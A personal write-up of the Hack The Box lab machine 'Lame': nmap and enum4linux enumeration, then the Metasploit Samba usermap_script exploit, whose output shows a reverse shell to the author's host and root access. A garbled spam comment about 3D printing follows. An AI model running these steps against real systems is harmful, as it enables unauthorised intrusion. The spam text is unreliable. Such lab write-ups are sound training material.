This is my first CTF write-up, so I wanted to start with an easy one. This is the retired machine from hackthebox.eu called "Lame". Let's jump right into it.
-----
Enumeration
I’ll start with a couple of nmap scans against the target. First, all TCP ports:
root@kali:~/htb/lame#
nmap -sC -sV -oA nmap/tcp -vv -p- 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07
21:19 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:19
.
.
.
.
.
PORT STATE
SERVICE REASON VERSION
21/tcp open ftp
syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to
10.10.14.7
| Logged in as ftp
| TYPE: ASCII
| No session
bandwidth limit
| Session
timeout in seconds is 300
| Control
connection is plain text
| Data
connections will be plain text
| vsFTPd 2.3.4
- secure, fast, stable
|_End of status
22/tcp open ssh
syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024
60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
| ssh-dss
.
.
.
.
.
.
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X -
4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd
3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open
distccd syn-ack ttl 63 distccd
v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE:
cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 3h57m42s, deviation: 0s, median:
3h57m42s
| p2p-conficker:
| Checking for
Conficker.C or higher...
| Check 1 (port
59488/tcp): CLEAN (Timeout)
| Check 2 (port
29535/tcp): CLEAN (Timeout)
| Check 3 (port
60839/udp): CLEAN (Timeout)
| Check 4 (port
40169/udp): CLEAN (Timeout)
|_ 0/4 checks are
positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Unix (Samba
3.0.20-Debian)
| NetBIOS
computer name:
| Workgroup:
WORKGROUP\x00
|_ System time:
2019-04-07T21:18:55-04:00
|_smb2-security-mode: Couldn't establish a SMBv2
connection.
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect
results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.18
seconds
Raw
packets sent: 131149 (5.771MB) | Rcvd: 87 (3.812KB)
Next, the top 1000 UDP ports:
root@kali:~/htb/lame#
nmap -sU --top-ports 1000 -oA nmap/udp -vv 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07
21:29 EDT
Initiating Ping Scan at 21:29
Scanning 10.10.10.3 [4 ports]
.
.
.
.
.
PORT STATE SERVICE
REASON
22/udp closed
ssh port-unreach ttl 63
139/udp closed netbios-ssn port-unreach ttl 63
445/udp closed microsoft-ds port-unreach ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 9.81
seconds
Raw
packets sent: 2003 (57.978KB) | Rcvd: 6 (308B)
SMB is open and can be a great source of information, so
let’s throw enum4linux at the box and see what it comes up with.
root@kali:~/htb/lame#
enum4linux -a 10.10.10.3
Starting enum4linux v0.8.9 (
http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 7 21:35:31 2019
==========================
| Target
Information |
==========================
Target ........... 10.10.10.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain
admins, root, bin, none
==================================================
| Enumerating
Workgroup/Domain on 10.10.10.3 |
==================================================
[E] Can't find workgroup/domain
==========================================
| Nbtstat
Information for 10.10.10.3 |
==========================================
Looking up status of 10.10.10.3
No reply from 10.10.10.3
===================================
| Session Check
on 10.10.10.3 |
===================================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.3 allows sessions using username '',
password ''
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
=========================================
| Getting domain
SID for 10.10.10.3 |
=========================================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of
a workgroup
====================================
| OS information
on 10.10.10.3 |
====================================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.)
or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.3 from smbclient:
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.3 from srvinfo:
LAME Wk Sv PrQ Unx NT SNT lame server
(Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server
type : 0x9a03
===========================
| Users on
10.10.10.3 |
===========================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 866.
.
.
.
.
.
user:[uucp] rid:[0x3fc]
=======================================
| Share
Enumeration on 10.10.10.3 |
=======================================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type
Comment
--------- ----
-------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba
3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
[+] Attempting to map shares on 10.10.10.3
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/print$ Mapping:
DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/tmp Mapping:
OK, Listing: OK
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/opt Mapping:
DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/IPC$ [E]
Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/ADMIN$ Mapping:
DENIED, Listing: N/A
==================================================
| Password
Policy Information for 10.10.10.3 |
==================================================
[+] Attaching to 10.10.10.3 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+]
LAME
[+]
Builtin
[+] Password Info for Domain: LAME
[+]
Minimum password length: 5
[+]
Password history length: None
[+]
Maximum password age: Not Set
[+]
Password Complexity Flags: 000000
[+]
Domain Refuse Password Change: 0
[+]
Domain Password Store Cleartext: 0
[+]
Domain Password Lockout Admins: 0
[+]
Domain Password No Clear Change: 0
[+]
Domain Password No Anon Change: 0
[+]
Domain Password Complex: 0
[+]
Minimum password age: None
[+]
Reset Account Lockout Counter: 30 minutes
[+]
Locked Account Duration: 30 minutes
[+]
Account Lockout Threshold: None
[+]
Forced Log off Time: Not Set
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
============================
| Groups on
10.10.10.3 |
============================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
[+] Getting domain group memberships:
=====================================================================
| Users on
10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 710.
===========================================
| Getting
printer info for 10.10.10.3 |
===========================================
Use of uninitialized value $global_workgroup in
concatenation (.) or string at ./enum4linux.pl line 991.
No printers returned.
enum4linux complete on Sun Apr 7 21:37:59 2019
We see that nmap and enum4linux both detect the Samba
version as “Samba 3.0.20-Debian”. I’ll note this as it could be useful for a
quick pwn later and continue with enumeration.
Nmap also detected FTP open and anonymous login allowed,
so I’ll use FileZilla to see if I can browse the FTP server. I didn’t find any
files, but we have the FTP version, “vsFTPd 2.3.4”.
I see that port 3632 is open and nmap lists it as being
distcc, but I’m not familiar with this service. Off to Google for a little reading.
After some brief research, I’ve found that distcc is used
for distributed C compilation. It isn’t something that is enabled by default,
so it is definitely worth looking into to see if it is exploitable.
Nmap detected Ubuntu 4.2.4-1ubuntu4 when checking the
service. This looks like the gcc version, so I’m going to go back to Google
to find the corresponding Ubuntu version.
Looks like this Ubuntu 8.04 Hardy.
Exploit
We now know the OS version and multiple service versions that
are running on the target device. Let’s go back to Google again to see what we
can find. That version of Samba looks very old and probably has a remote code
execution vulnerability, so I’ll start there.
The first search result from rapid7 details a Metasploit
module for the exact version of SMB running on our target. Sounds promising, so
I’ll fire up Metasploit and give it a try.
root@kali:/mnt/hgfs/htb/lame#
msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
_---------.
.'
####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@
@@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@
@@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'-
.'--"
".@'
; @ @ `. ;'
|@@@@
@@@ @ .
' @@@
@@ @@
,
`.@@@@ @@ .
',@@ @ ;
_____________
( 3 C )
/|___ / Metasploit! \
;@'. __*__,." \|---
\_____________/
'(.,...."/
=[
metasploit v5.0.4-dev
]
+ -- --=[ 1852 exploits - 1047 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > use
exploit/multi/samba/usermap_script
msf5
exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOSTS yes The target address range or CIDR
identifier
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5
exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5
exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on
10.10.14.15:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KVAoHQWMq0RqJYHX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KVAoHQWMq0RqJYHX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.15:4444
-> 10.10.10.3:38912) at 2019-04-07 22:22:05 -0400
At this point, we don't get a visible prompt returned, but a quick 'ifconfig' shows that we are connected to our target.
ifconfig
eth0 Link
encap:Ethernet HWaddr
00:50:56:b2:4d:ba
inet
addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6
addr: dead:beef::250:56ff:feb2:4dba/64 Scope:Global
inet6
addr: fe80::250:56ff:feb2:4dba/64 Scope:Link
UP
BROADCAST RUNNING MULTICAST
MTU:1500 Metric:1
RX
packets:612 errors:0 dropped:0 overruns:0 frame:0
TX
packets:185 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX
bytes:79638 (77.7 KB) TX bytes:20057
(19.5 KB)
Interrupt:19 Base address:0x2000
lo Link
encap:Local Loopback
inet
addr:127.0.0.1 Mask:255.0.0.0
inet6
addr: ::1/128 Scope:Host
UP
LOOPBACK RUNNING MTU:16436 Metric:1
RX
packets:605 errors:0 dropped:0 overruns:0 frame:0
TX
packets:605 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX
bytes:275873 (269.4 KB) TX bytes:275873
(269.4 KB)
whoami
root
id
uid=0(root) gid=0(root)
And there we have it! “Lame” was quickly rooted using the
vulnerability detailed in CVE-2007-2447 and a very reliable Metasploit module. I briefly
tested distcc on port 3632 and it is exploitable as well, but you do not get
root. Stay tuned for another post where I exploit distcc and then attempt
privilege escalation.
Hit me up in the comments or by email if you have any questions or suggestions.
Peace,
TK
This additive process uses a stereolithography apparatus to remodel liquid materials right into a stable printed object. Printers right here are typically a little pricier, however would possibly be} guaranteed to get higher quality prints and a greater experience. Some 3D farms additionally use Selective Laser Sintering , an additive manufacturing technique that uses lasers to sinter powdered supplies to create parts. SLS printing offers higher decision, quicker print times, better mechanical properties, high precision machining and can produce more complex geometries than FDM printing.
ReplyDelete